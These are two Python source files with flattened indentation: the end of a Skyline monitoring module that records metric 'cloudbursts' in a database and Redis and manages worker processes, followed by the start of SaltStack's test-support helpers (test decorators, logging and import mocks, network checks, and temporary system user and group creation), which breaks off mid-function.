result = connection.execute(ins)
new_cloudburst_id = result.inserted_primary_key[0]
new_cloudburst_ids.append(new_cloudburst_id)
connection.close()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: could not insert cloudburst record into DB for %s: %s - %s' % (
base_name, str(found_cloudbursts_to_add[base_name][cloudburst_ts]), e))
if new_cloudburst_id:
try:
self.redis_conn.hset(cloudburst_metrics_key, base_name, str(found_cloudbursts_to_add[base_name][cloudburst_ts]))
self.redis_conn.expire(cloudburst_metrics_key, 604800)
cloudburst_metrics_key_created = True
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add to %s Redis hash key - %s' % (
cloudburst_metrics_key, e))
# Add it to the known_cloudbursts dict
if metric_id not in list(known_cloudbursts.keys()):
known_cloudbursts[metric_id] = {}
known_cloudbursts[metric_id][cloudburst_ts] = metric_id
# Add both short_period and long_period timestamp keys to
# the luminosity.cloudburst.processed.anomalies Redis hash
# key so that the timestamps identified in later short_period
# analysis can be looked up and skipped if already processed
# rather than sent through to the second stage to improve
# efficiency.
processed_timestamps = []
try:
short_period_anomalies = m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
processed_timestamps = [int(ts) for ts, value in short_period_anomalies]
long_period_anomalies = second_stage_m66_candidate_metrics[base_name][custom_algorithm]['anomalies']
long_period_processed_timestamps = [int(ts) for ts, value in long_period_anomalies]
processed_timestamps = processed_timestamps + long_period_processed_timestamps
processed_timestamps = list(set(processed_timestamps))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to determine processed_timestamps for %s - %s' % (
base_name, e))
for processed_timestamp in processed_timestamps:
try:
key_data = {'cloudburst_id': new_cloudburst_id, 'processed_at': now_timestamp}
processed_anomaly_key = '%s.%s' % (base_name, str(int(processed_timestamp)))
self.redis_conn_decoded.hset(cloudburst_anomalies_processed_key, processed_anomaly_key, str(key_data))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: find_cloudbursts :: failed to add to %s Redis hash key - %s' % (
cloudburst_anomalies_processed_key, e))
if cloudburst_metrics_key_created:
logger.info('cloudburst :: find_cloudbursts :: created %s Redis hash key' % (
cloudburst_metrics_key))
logger.info('cloudburst :: find_cloudbursts :: added %s new cloudbursts to the database' % (
str(len(new_cloudburst_ids))))
if engine:
engine_disposal(engine)
spin_end = time() - spin_start
logger.info('cloudburst :: find_cloudbursts :: %s metrics took %.2f seconds' % (
str(len(assigned_metrics)), spin_end))
# cloudburst table
# id, source_metric_id, timestamp, full_duration, resolution, processed
# cloudbursts table
# id, cloudburst_id, related_metric_id, ppscore_1, ppscore_2
# Maybe do not just do ppscore maybe use ruptures to identify metrics
# that have changespoints in the same window
return
def run(self):
"""
- Called when the process intializes.
- Determine if Redis is up
- Spawn a find_cloudbursts process to do analysis
- Wait for the process to finish.
- run_every 300 seconds
"""
# Log management to prevent overwriting
# Allow the bin/<skyline_app>.d to manage the log
now = time()
log_wait_for = now + 5
while now < log_wait_for:
if os.path.isfile(skyline_app_loglock):
sleep(.1)
now = time()
else:
now = log_wait_for + 1
logger.info('luminosity/cloudburst :: starting find_cloudbursts')
if SERVER_METRIC_PATH == '':
logger.warning('warning :: luminosity/cloudburst :: settings.SERVER_METRICS_NAME is not declared in settings.py, defaults to \'\'')
while 1:
now = time()
# Make sure Redis is up
try:
self.redis_conn.ping()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst cannot connect to redis at socket path %s - %s' % (
settings.REDIS_SOCKET_PATH, e))
sleep(10)
try:
self.redis_conn = get_redis_conn(skyline_app)
self.redis_conn_decoded = get_redis_conn_decoded(skyline_app)
except Exception as e:
logger.info(traceback.format_exc())
logger.error('error :: cloudburst cannot connect to get_redis_conn - %s' % e)
continue
# Report app up
try:
self.redis_conn.setex('luminosity.cloudburst', 120, now)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: could not update the Redis luminosity.cloudburst key - %s' % e)
# Get all Redis metrics
unique_metrics = []
try:
unique_metrics = list(self.redis_conn_decoded.smembers(full_uniques))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed get unique_metrics from %s Redis key - %s' % (
full_uniques, e))
unique_metrics = []
now_timestamp = int(time())
key_reference_timestamp = (int(now_timestamp) // run_every * run_every)
processed_metrics_key = 'luminosity.cloudburst.processed_metrics.%s' % str(key_reference_timestamp)
cloudburst_info_key = 'luminosity.cloudburst.info.%s' % str(key_reference_timestamp)
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
for i in range(1, LUMINOSITY_CLOUDBURST_PROCESSES + 1):
if i > len(unique_metrics):
logger.warning('warning :: cloudburst :: skyline is set for more cores than needed.')
break
try:
p = Process(target=self.find_cloudbursts, args=(i, unique_metrics))
pids.append(p)
pid_count += 1
logger.info('starting %s of %s find_cloudbursts processes' % (str(pid_count), str(LUMINOSITY_CLOUDBURST_PROCESSES)))
p.start()
spawned_pids.append(p.pid)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to spawn find_cloudbursts process - %s' % e)
# Self monitor processes and terminate if any find_cloudbursts
# has run for longer than run_every - 10
p_starts = time()
while time() - p_starts <= (run_every - 10):
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info('cloudburst :: %s find_cloudbursts processes completed in %.2f seconds' % (
str(LUMINOSITY_CLOUDBURST_PROCESSES), time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('cloudburst :: timed out, killing find_cloudbursts process')
for p in pids:
logger.info('cloudburst :: killing find_cloudbursts process')
p.terminate()
logger.info('cloudburst :: killed find_cloudbursts process')
for p in pids:
if p.is_alive():
try:
logger.info('cloudburst :: stopping find_cloudbursts - %s' % (str(p.is_alive())))
p.terminate()
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to stop find_cloudbursts - %s' % e)
processed_metrics = []
try:
processed_metrics = list(self.redis_conn_decoded.smembers(processed_metrics_key))
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed get %s set from Redis - %s' % (
processed_metrics_key, e))
processed_metrics = []
if processed_metrics:
try:
self.redis_conn.expire(processed_metrics_key, 600)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed set expire on %s Redis set - %s' % (
processed_metrics_key, e))
processed = 0
no_data = 0
too_short = 0
too_old = 0
not_analysed = 0
analysed = 0
cloudburst_info_dict = {}
try:
cloudburst_info_dict = self.redis_conn_decoded.hgetall(cloudburst_info_key)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed get %s set from Redis - %s' % (
cloudburst_info_dict, e))
cloudburst_info_dict = {}
if cloudburst_info_dict:
try:
self.redis_conn.expire(cloudburst_info_key, 600)
except Exception as e:
logger.error('error :: cloudburst :: failed set expire on %s Redis set - %s' % (
cloudburst_info_key, e))
for key in list(cloudburst_info_dict.keys()):
info_dict = {}
try:
info_dict = literal_eval(cloudburst_info_dict[key])
except Exception as e:
logger.error('error :: cloudburst :: failed literal_eval cloudburst_info_dict[%s] - %s' % (
str(key), e))
info_dict = {}
if info_dict:
processed += info_dict['processed']
no_data += info_dict['no_data']
too_short += info_dict['too_short']
too_old += info_dict['too_old']
not_analysed += info_dict['not_analysed']
analysed += info_dict['analysed']
info_data_dict = {
'processed': processed,
'analysed': analysed,
'not_analysed': not_analysed,
'no_data': no_data,
'too_short': too_short,
'too_old': too_old,
}
logger.info('cloudburst :: info: %s' % str(info_data_dict))
try:
unique_metrics_set = set(list(unique_metrics))
processed_metrics_set = set(list(processed_metrics))
if unique_metrics_set == processed_metrics_set:
logger.info('cloudburst :: all %s unique_metrics were processed' % str(len(unique_metrics)))
else:
not_processed_metrics_key = 'luminosity.cloudburst.not_processed_metrics.%s' % str(key_reference_timestamp)
not_processed_metrics = []
set_difference = unique_metrics_set.difference(processed_metrics_set)
for metric_name in set_difference:
not_processed_metrics.append(metric_name)
try:
self.redis_conn.sadd(not_processed_metrics_key, metric_name)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to add %s to %s Redis set - %s' % (
metric_name, not_processed_metrics_key, e))
try:
self.redis_conn.expire(not_processed_metrics_key, 3600)
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to set expire on %s Redis set - %s' % (
not_processed_metrics_key, e))
logger.warning('warning :: cloudburst :: there are %s metrics that were not processed of the %s unique_metrics' % (
str(len(not_processed_metrics)),
str(len(unique_metrics))))
del set_difference
del unique_metrics_set
del processed_metrics_set
except Exception as e:
logger.error(traceback.format_exc())
logger.error('error :: cloudburst :: failed to determine whether the unique_metrics_set and processed_metrics_set are different - %s' % e)
process_runtime = time() - now
if process_runtime < run_every:
sleep_for = (run_every - process_runtime)
process_runtime_now = time() - now
sleep_for = (run_every - process_runtime_now)
logger.info('cloudburst :: sleeping for %.2f seconds due to low run time...' % sleep_for)
sleep(sleep_for)
try:
del sleep_for
except Exception as e:
logger.error('error :: cloudburst :: failed to del sleep_for - %s' % e)
try:
del process_runtime
except Exception as e:
logger.error('error :: cloudburst :: failed to del process_runtime - %s' % e)
|
helpers.py
|
"""
:copyright: Copyright 2013-2017 by the SaltStack Team, see AUTHORS for more details.
:license: Apache 2.0, see LICENSE for more details.
tests.support.helpers
~~~~~~~~~~~~~~~~~~~~~
Test support helpers
"""
import base64
import builtins
import errno
import fnmatch
import functools
import inspect
import io
import json
import logging
import os
import pathlib
import random
import shutil
import socket
import string
import subprocess
import sys
import tempfile
import textwrap
import threading
import time
import types
from contextlib import contextmanager
import attr
import pytest
import salt.ext.tornado.ioloop
import salt.ext.tornado.web
import salt.utils.files
import salt.utils.platform
import salt.utils.pycrypto
import salt.utils.stringutils
import salt.utils.versions
from pytestshellutils.exceptions import ProcessFailed
from pytestshellutils.utils import ports
from pytestshellutils.utils.processes import ProcessResult
from tests.support.mock import patch
from tests.support.runtests import RUNTIME_VARS
from tests.support.sminion import create_sminion
from tests.support.unit import SkipTest, _id, skip
log = logging.getLogger(__name__)
HAS_SYMLINKS = None
PRE_PYTEST_SKIP_OR_NOT = "PRE_PYTEST_DONT_SKIP" not in os.environ
PRE_PYTEST_SKIP_REASON = (
"PRE PYTEST - This test was skipped before running under pytest"
)
PRE_PYTEST_SKIP = pytest.mark.skip_on_env(
"PRE_PYTEST_DONT_SKIP", present=False, reason=PRE_PYTEST_SKIP_REASON
)
ON_PY35 = sys.version_info < (3, 6)
SKIP_INITIAL_PHOTONOS_FAILURES = pytest.mark.skip_on_env(
"SKIP_INITIAL_PHOTONOS_FAILURES",
eq="1",
reason="Failing test when PhotonOS was added to CI",
)
def no_symlinks():
"""
Check if git is installed and has symlinks enabled in the configuration.
"""
global HAS_SYMLINKS
if HAS_SYMLINKS is not None:
return not HAS_SYMLINKS
output = ""
try:
output = subprocess.Popen(
["git", "config", "--get", "core.symlinks"],
cwd=RUNTIME_VARS.TMP,
stdout=subprocess.PIPE,
).communicate()[0]
except OSError as exc:
if exc.errno != errno.ENOENT:
raise
except subprocess.CalledProcessError:
# git returned non-zero status
pass
HAS_SYMLINKS = False
if output.strip() == "true":
HAS_SYMLINKS = True
return not HAS_SYMLINKS
def destructiveTest(caller):
"""
Mark a test case as a destructive test for example adding or removing users
from your system.
.. code-block:: python
class MyTestCase(TestCase):
@destructiveTest
def test_create_user(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@destructiveTest`, it will be removed in {date}, and"
" instead use `@pytest.mark.destructive_test`.",
stacklevel=3,
)
setattr(caller, "__destructive_test__", True)
if os.environ.get("DESTRUCTIVE_TESTS", "False").lower() == "false":
reason = "Destructive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def expensiveTest(caller):
"""
Mark a test case as an expensive test, for example, a test which can cost
money(Salt's cloud provider tests).
.. code-block:: python
class MyTestCase(TestCase):
@expensiveTest
def test_create_user(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@expensiveTest`, it will be removed in {date}, and instead"
" use `@pytest.mark.expensive_test`.",
stacklevel=3,
)
setattr(caller, "__expensive_test__", True)
if os.environ.get("EXPENSIVE_TESTS", "False").lower() == "false":
reason = "Expensive tests are disabled"
if not isinstance(caller, type):
@functools.wraps(caller)
def skip_wrapper(*args, **kwargs):
raise SkipTest(reason)
caller = skip_wrapper
caller.__unittest_skip__ = True
caller.__unittest_skip_why__ = reason
return caller
def slowTest(caller):
"""
Mark a test case as a slow test.
.. code-block:: python
class MyTestCase(TestCase):
@slowTest
def test_that_takes_much_time(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@slowTest`, it will be removed in {date}, and instead use "
"`@pytest.mark.slow_test`.",
stacklevel=3,
)
setattr(caller, "__slow_test__", True)
return caller
def flaky(caller=None, condition=True, attempts=4):
"""
Mark a test as flaky. The test will attempt to run five times,
looking for a successful run. After an immediate second try,
it will use an exponential backoff starting with one second.
.. code-block:: python
class MyTestCase(TestCase):
@flaky
def test_sometimes_works(self):
pass
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@flaky`, it will be removed in {date}, and instead use "
"`@pytest.mark.flaky`. See https://pypi.org/project/flaky for information on "
"how to use it.",
stacklevel=3,
)
if caller is None:
return functools.partial(flaky, condition=condition, attempts=attempts)
if isinstance(condition, bool) and condition is False:
# Don't even decorate
return caller
elif callable(condition):
if condition() is False:
# Don't even decorate
return caller
if inspect.isclass(caller):
attrs = [n for n in dir(caller) if n.startswith("test_")]
for attrname in attrs:
try:
function = getattr(caller, attrname)
if not inspect.isfunction(function) and not inspect.ismethod(function):
continue
setattr(
caller,
attrname,
flaky(caller=function, condition=condition, attempts=attempts),
)
except Exception as exc: # pylint: disable=broad-except
log.exception(exc)
continue
return caller
@functools.wraps(caller)
def wrap(cls):
for attempt in range(0, attempts):
try:
if attempt > 0:
# Run through setUp again
# We only run it after the first iteration(>0) because the regular
# test runner will have already ran setUp the first time
setup = getattr(cls, "setUp", None)
if callable(setup):
setup()
return caller(cls)
except SkipTest as exc:
cls.skipTest(exc.args[0])
except Exception as exc: # pylint: disable=broad-except
exc_info = sys.exc_info()
if isinstance(exc, SkipTest):
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
if not isinstance(exc, AssertionError) and log.isEnabledFor(
logging.DEBUG
):
log.exception(exc, exc_info=exc_info)
if attempt >= attempts - 1:
# We won't try to run tearDown once the attempts are exhausted
# because the regular test runner will do that for us
raise exc_info[0].with_traceback(exc_info[1], exc_info[2])
# Run through tearDown again
teardown = getattr(cls, "tearDown", None)
if callable(teardown):
teardown()
backoff_time = attempt ** 2
log.info("Found Exception. Waiting %s seconds to retry.", backoff_time)
time.sleep(backoff_time)
return cls
return wrap
def requires_sshd_server(caller):
"""
Mark a test as requiring the tests SSH daemon running.
.. code-block:: python
class MyTestCase(TestCase):
@requiresSshdServer
def test_create_user(self):
pass
"""
raise RuntimeError(
"Please replace @requires_sshd_server with @pytest.mark.requires_sshd_server"
)
class RedirectStdStreams:
"""
Temporarily redirect system output to file like objects.
Default is to redirect to `os.devnull`, which just mutes output, `stdout`
and `stderr`.
"""
def __init__(self, stdout=None, stderr=None):
if stdout is None:
# pylint: disable=resource-leakage
stdout = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
if stderr is None:
# pylint: disable=resource-leakage
stderr = salt.utils.files.fopen(os.devnull, "w")
# pylint: enable=resource-leakage
self.__stdout = stdout
self.__stderr = stderr
self.__redirected = False
self.patcher = patch.multiple(sys, stderr=self.__stderr, stdout=self.__stdout)
def __enter__(self):
self.redirect()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.unredirect()
def redirect(self):
self.old_stdout = sys.stdout
self.old_stdout.flush()
self.old_stderr = sys.stderr
self.old_stderr.flush()
self.patcher.start()
self.__redirected = True
def unredirect(self):
if not self.__redirected:
return
try:
self.__stdout.flush()
self.__stdout.close()
except ValueError:
# already closed?
pass
try:
self.__stderr.flush()
self.__stderr.close()
except ValueError:
# already closed?
pass
self.patcher.stop()
def flush(self):
if self.__redirected:
try:
self.__stdout.flush()
except Exception: # pylint: disable=broad-except
pass
try:
self.__stderr.flush()
except Exception: # pylint: disable=broad-except
pass
class TstSuiteLoggingHandler:
"""
Simple logging handler which can be used to test if certain logging
messages get emitted or not:
.. code-block:: python
with TstSuiteLoggingHandler() as handler:
# (...) Do what ever you wish here
handler.messages # here are the emitted log messages
"""
def __init__(self, level=0, format="%(levelname)s:%(message)s"):
self.level = level
self.format = format
self.activated = False
self.prev_logging_level = None
def activate(self):
class Handler(logging.Handler):
def __init__(self, level):
logging.Handler.__init__(self, level)
self.messages = []
def emit(self, record):
self.messages.append(self.format(record))
self.handler = Handler(self.level)
formatter = logging.Formatter(self.format)
self.handler.setFormatter(formatter)
logging.root.addHandler(self.handler)
self.activated = True
# Make sure we're running with the lowest logging level with our
# tests logging handler
current_logging_level = logging.root.getEffectiveLevel()
if current_logging_level > logging.DEBUG:
self.prev_logging_level = current_logging_level
logging.root.setLevel(0)
def deactivate(self):
if not self.activated:
return
logging.root.removeHandler(self.handler)
# Restore previous logging level if changed
if self.prev_logging_level is not None:
logging.root.setLevel(self.prev_logging_level)
@property
def messages(self):
if not self.activated:
return []
return self.handler.messages
def clear(self):
self.handler.messages = []
def __enter__(self):
self.activate()
return self
def __exit__(self, type, value, traceback):
self.deactivate()
self.activated = False
# Mimic some handler attributes and methods
@property
def lock(self):
if self.activated:
return self.handler.lock
def createLock(self):
if self.activated:
return self.handler.createLock()
def acquire(self):
if self.activated:
return self.handler.acquire()
def release(self):
if self.activated:
return self.handler.release()
class ForceImportErrorOn:
"""
This class is meant to be used in mock'ed test cases which require an
``ImportError`` to be raised.
>>> import os.path
>>> with ForceImportErrorOn('os.path'):
... import os.path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 263, in __import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
>>> with ForceImportErrorOn(('os', 'path')):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
<module 'os' from '/usr/lib/python2.7/os.pyc'>
Traceback (most recent call last):
File "<stdin>", line 4, in <module>
File "salttesting/helpers.py", line 288, in __fake_import__
name, ', '.join(fromlist)
ImportError: Forced ImportError raised for 'from os import path'
>>>
>>> with ForceImportErrorOn(('os', 'path'), 'os.path'):
... import os.path
... sys.modules.pop('os', None)
... from os import path
...
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
File "salttesting/helpers.py", line 281, in __fake_import__
'Forced ImportError raised for {0!r}'.format(name)
ImportError: Forced ImportError raised for 'os.path'
>>>
"""
def __init__(self, *module_names):
self.__module_names = {}
for entry in module_names:
if isinstance(entry, (list, tuple)):
modname = entry[0]
self.__module_names[modname] = set(entry[1:])
else:
self.__module_names[entry] = None
self.__original_import = builtins.__import__
self.patcher = patch.object(builtins, "__import__", self.__fake_import__)
def patch_import_function(self):
self.patcher.start()
def restore_import_function(self):
self.patcher.stop()
def __fake_import__(
self, name, globals_=None, locals_=None, fromlist=None, level=None
):
if level is None:
level = 0
if fromlist is None:
fromlist = []
if name in self.__module_names:
importerror_fromlist = self.__module_names.get(name)
if importerror_fromlist is None:
raise ImportError("Forced ImportError raised for {!r}".format(name))
if importerror_fromlist.intersection(set(fromlist)):
raise ImportError(
"Forced ImportError raised for {!r}".format(
"from {} import {}".format(name, ", ".join(fromlist))
)
)
return self.__original_import(name, globals_, locals_, fromlist, level)
def __enter__(self):
self.patch_import_function()
return self
def __exit__(self, exc_type, exc_value, traceback):
self.restore_import_function()
class MockWraps:
"""
Helper class to be used with the mock library.
To be used in the ``wraps`` keyword of ``Mock`` or ``MagicMock`` where you
want to trigger a side effect for X times, and afterwards, call the
original and un-mocked method.
As an example:
>>> def original():
... print 'original'
...
>>> def side_effect():
... print 'side effect'
...
>>> mw = MockWraps(original, 2, side_effect)
>>> mw()
side effect
>>> mw()
side effect
>>> mw()
original
>>>
"""
def __init__(self, original, expected_failures, side_effect):
self.__original = original
self.__expected_failures = expected_failures
self.__side_effect = side_effect
self.__call_counter = 0
def __call__(self, *args, **kwargs):
try:
if self.__call_counter < self.__expected_failures:
if isinstance(self.__side_effect, types.FunctionType):
return self.__side_effect()
raise self.__side_effect
return self.__original(*args, **kwargs)
finally:
self.__call_counter += 1
def requires_network(only_local_network=False):
"""
Simple decorator which is supposed to skip a test case in case there's no
network connection to the internet.
"""
salt.utils.versions.warn_until_date(
"20220101",
"Please stop using `@requires_network`, it will be removed in {date}, and"
" instead use `@pytest.mark.requires_network`.",
stacklevel=3,
)
def decorator(func):
@functools.wraps(func)
def wrapper(cls, *args, **kwargs):
has_local_network = False
# First lets try if we have a local network. Inspired in
# verify_socket
try:
pubsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# I wonder if we just have IPV6 support?
try:
pubsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
retsock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
pubsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
pubsock.bind(("", 18000))
pubsock.close()
retsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
retsock.bind(("", 18001))
retsock.close()
has_local_network = True
except OSError:
# Let's continue
pass
if only_local_network is True:
if has_local_network is False:
# Since we're only supposed to check local network, and no
# local network was detected, skip the test
cls.skipTest("No local network was detected")
return func(cls)
if os.environ.get("NO_INTERNET"):
cls.skipTest("Environment variable NO_INTERNET is set.")
# We are using the google.com DNS records as numerical IPs to avoid
# DNS lookups which could greatly slow down this check
for addr in (
"173.194.41.198",
"173.194.41.199",
"173.194.41.200",
"173.194.41.201",
"173.194.41.206",
"173.194.41.192",
"173.194.41.193",
"173.194.41.194",
"173.194.41.195",
"173.194.41.196",
"173.194.41.197",
):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.settimeout(0.25)
sock.connect((addr, 80))
# We connected? Stop the loop
break
except OSError:
# Let's check the next IP
continue
else:
cls.skipTest("No internet network connection was detected")
finally:
sock.close()
return func(cls, *args, **kwargs)
return wrapper
return decorator
def with_system_user(
username, on_existing="delete", delete=True, password=None, groups=None
):
"""
Create and optionally destroy a system user to be used within a test
case. The system user is created using the ``user`` salt module.
The decorated testcase function must accept 'username' as an argument.
:param username: The desired username for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user %r", username)
kwargs = {"timeout": 60, "groups": groups}
if salt.utils.platform.is_windows():
kwargs.update({"password": password})
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user %r", username)
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user %r", username)
create_user = cls.run_function("user.add", [username], **kwargs)
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not salt.utils.platform.is_windows() and password is not None:
if salt.utils.platform.is_darwin():
hashed_password = password
else:
hashed_password = salt.utils.pycrypto.gen_hash(password=password)
hashed_password = "'{}'".format(hashed_password)
add_pwd = cls.run_function(
"shadow.set_password", [username, hashed_password]
)
failure = None
try:
try:
return func(cls, username)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True], timeout=60
)
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user %r "
"afterwards did.",
username,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user %r",
username,
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
def with_system_group(group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system group to be used within a test
case. The system user is crated using the ``group`` salt module.
The decorated testcase function must accept 'group' as an argument.
:param group: The desired group name for the system user.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the group was created
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group %r", group)
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group %r "
"afterwards did.",
group,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group %r",
group,
)
if failure is not None:
# If an exception was thrown, raise it
raise failure[1].with_traceback(failure[2])
return wrap
return decorator
def with_system_user_and_group(username, group, on_existing="delete", delete=True):
"""
Create and optionally destroy a system user and group to be used within a
test case. The system user is crated using the ``user`` salt module, and
the system group is created with the ``group`` salt module.
The decorated testcase function must accept both the 'username' and 'group'
arguments.
:param username: The desired username for the system user.
:param group: The desired name for the system group.
:param on_existing: What to do when the desired username is taken. The
available options are:
* nothing: Do nothing, act as if the user was created.
* delete: delete and re-create the existing user
* skip: skip the test case
"""
if on_existing not in ("nothing", "delete", "skip"):
raise RuntimeError(
"The value of 'on_existing' can only be one of, "
"'nothing', 'delete' and 'skip'"
)
if not isinstance(delete, bool):
raise RuntimeError("The value of 'delete' can only be 'True' or 'False'")
def decorator(func):
@functools.wraps(func)
def wrap(cls):
# Let's add the user to the system.
log.debug("Creating system user %r", username)
create_user = cls.run_function("user.add", [username])
log.debug("Creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_user:
log.debug("Failed to create system user")
# The user was not created
if on_existing == "skip":
cls.skipTest("Failed to create system user {!r}".format(username))
if on_existing == "delete":
log.debug("Deleting the system user %r", username)
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
if not delete_user:
cls.skipTest(
"A user named {!r} already existed on the "
"system and re-creating it was not possible".format(
username
)
)
log.debug("Second time creating system user %r", username)
create_user = cls.run_function("user.add", [username])
if not create_user:
cls.skipTest(
"A user named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
username
)
)
if not create_group:
log.debug("Failed to create system group")
# The group was not created
if on_existing == "skip":
cls.skipTest("Failed to create system group {!r}".format(group))
if on_existing == "delete":
log.debug("Deleting the system group %r", group)
delete_group = cls.run_function("group.delete", [group])
if not delete_group:
cls.skipTest(
"A group named {!r} already existed on the "
"system and re-creating it was not possible".format(group)
)
log.debug("Second time creating system group %r", group)
create_group = cls.run_function("group.add", [group])
if not create_group:
cls.skipTest(
"A group named {!r} already existed, was deleted "
"as requested, but re-creating it was not possible".format(
group
)
)
failure = None
try:
try:
return func(cls, username, group)
except Exception as exc: # pylint: disable=W0703
log.error(
"Running %r raised an exception: %s", func, exc, exc_info=True
)
# Store the original exception details which will be raised
# a little further down the code
failure = sys.exc_info()
finally:
if delete:
delete_user = cls.run_function(
"user.delete", [username, True, True]
)
delete_group = cls.run_function("group.delete", [group])
if not delete_user:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system user %r "
"afterwards did.",
username,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system user %r",
username,
)
if not delete_group:
if failure is None:
log.warning(
"Although the actual test-case did not fail, "
"deleting the created system group %r "
"afterwards did.",
group,
)
else:
log.warning(
"The test-case failed and also did the removal"
" of the system group %r",
group,
)
if failure is not None:
# If an exception was thrown, raise it
